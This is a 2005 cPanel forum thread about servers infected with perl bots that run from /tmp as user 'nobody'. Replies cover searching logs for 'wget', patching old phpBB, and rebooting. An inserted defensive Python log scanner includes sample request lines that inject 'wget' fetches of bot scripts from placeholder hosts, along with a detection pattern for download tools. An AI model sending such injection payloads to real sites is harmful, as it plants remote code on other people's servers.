The Community Forums

Interact with an entire community of cPanel & WHM users!

How can I kill all nobody processes?

Discussion in 'General Discussion' started by eLifeCP, Nov 13, 2005.

  1. eLifeCP

    I have a lot of problems. I have 10 servers; I use Trustix, Red Hat 9, Red Hat Enterprise, CentOS, Fedora and FreeBSD. I think no OS can protect tmp. I found bot.txt, worm.txt, phpbb worm, udb.pl.

    I always find perl processes in tmp. I want to know how I can protect it, and what the command is to kill all processes of nobody.

    I have a suggestion from ev1, but I don't know how to do it. I asked cPanel, but cPanel suggested that I must find the customer running it.

    I tried searching this forum. I found this command for finding the customer who has the problem:

    grep "wget" /usr/local/apache/domlogs/*

    ev1 suggested this to me for the udb.pl problem:

    -------------------------------------------------------
    Our investigation found that your server was only exploited. No rootkits were installed. Nor was root access achieved. None of your local user accounts had started the attack script either.

    Simply put, the hacker exploited the system, most likely via an apache/website script, achieved a terminal shell connection similar to ssh and telnet, then proceeded to launch an outbound attack.

    Some of the best ways to secure the server are: Have apache run under its own user name (apache or httpd). Have the 'user' account for apache be unable to execute files located in /tmp and /var/tmp directories. The user account 'nobody' should have these execution rights removed also. Nor should apache have access to execute any other applications beyond php/cgi/perl/etc. to prevent future exploitation.

    Then you want to comb through the httpd and other logs under /var/log/ and see if you can identify the means with which the hacker exploited the system to gain access. (I.e., did they use a buffer overflow exploit on apache? Or did they take advantage of some security hole in a website's perl/cgi/php/etc. script? Was the ftp service exploited?) Once the security hole that they came in on has been identified, you can set out to secure the server so that it's not exploited once more via that hole.
    -------------------------------------------------------

    Can anyone tell me how I can do this?

    Thank you so much
    Best Regards
    eLife
     
  2. AndyReed

    I suggest you protect and secure your servers. Running a couple of commands to kill some processes won't solve the issue. If you don't wish to hire a sys admin to secure your server(s), you need to search these forums. The security issue you're dealing with has been discussed many times. :)
     
  3. rpmws

    Searching logs for wget will get you started on what site was used. Find all the old phpBB installs and fix that... mod_security helps some. But if you have no clue what this all means... get an admin that does.
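
An added example, not part of any post in this thread: a Python version of the domlog search for `wget` mentioned above. It checks only the request field of each line and percent-decodes it first, so an encoded `wget` is still counted and a match in the referrer or user agent is not. The function names, the sample lines and the `curl`/`lwp-download` tokens are assumptions; only the `wget` search comes from the thread.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Combined/common log format: ip ident user [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# Download tools to flag; wget is from the thread, the other two are assumptions.
TOOLS_RE = re.compile(r'\b(wget|curl|lwp-download)\b', re.IGNORECASE)


def scan_domlog(domain, lines):
    """Return one dict per request whose decoded target names a download tool."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed or truncated line
        ip, when, method, target, status = m.groups()
        decoded = unquote_plus(unquote_plus(target))  # undo single and double encoding
        tool = TOOLS_RE.search(decoded)
        if tool:
            hits.append({"domain": domain, "ip": ip, "time": when,
                         "script": target.split("?", 1)[0],
                         "tool": tool.group(1).lower(), "status": int(status)})
    return hits


def scripts_by_hits(hits):
    """Count hits per (domain, script) so the most-requested script sorts first."""
    return Counter((h["domain"], h["script"]) for h in hits).most_common()


# Constructed sample lines (documentation addresses and placeholder hosts, not real traffic).
SAMPLE = [
    '203.0.113.5 - - [13/Nov/2005:04:10:01 -0600] "GET /old/script.php?x=wget%20http://host.invalid/bot.txt HTTP/1.0" 200 5120 "-" "-"',
    '203.0.113.5 - - [13/Nov/2005:04:10:09 -0600] "GET /old/script.php?x=%77get+http%3A%2F%2Fhost.invalid%2Fudb.pl HTTP/1.0" 200 5120 "-" "-"',
    '198.51.100.7 - - [13/Nov/2005:04:11:30 -0600] "GET /index.php HTTP/1.1" 200 900 "http://example.com/?q=wget" "Wget/1.10"',
    '198.51.100.9 - - [13/Nov/2005:04:12:00 -0600] "GET /images/logo.gif HTTP/1.1" 200 700 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    found = scan_domlog("example.com", SAMPLE)
    for (domain, script), n in scripts_by_hits(found):
        print(f"{n:3d}  {domain}{script}")
```

To run it over real logs, pass each domlog file's name as `domain` and the open file as `lines`; the script that collects the most hits is the one to inspect and patch first.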
     
  4. WestBend

    www.cplicensing.net.
    Download their check phpBB version script to look for bad phpBBs. Also check for WordPress versions less than 1.5.2.

    Pay chirpy to secure your servers!
    www.configservers.com
    He does a great job!
     
  5. eLifeCP

    Thank you so much. I found the old phpBB version, but when I look for nobody perl processes, I have a lot of processes. I need a command to kill all processes of nobody, to kill them now and fix later. Can anyone help me with the command?

    Thank you so much
     
  6. lloyd_tennison

    For someone who is NOT a server admin, you can kill all the processes (but it probably will not do much good as they might just start all over again with the exploit) by simply rebooting.

    No hard commands, no searching and killing processes, just reboot.

    (BTW - the command for that from ssh is "reboot" - without the quotes. It may take 15 minutes before all services are restarted, so be aware of that.)
     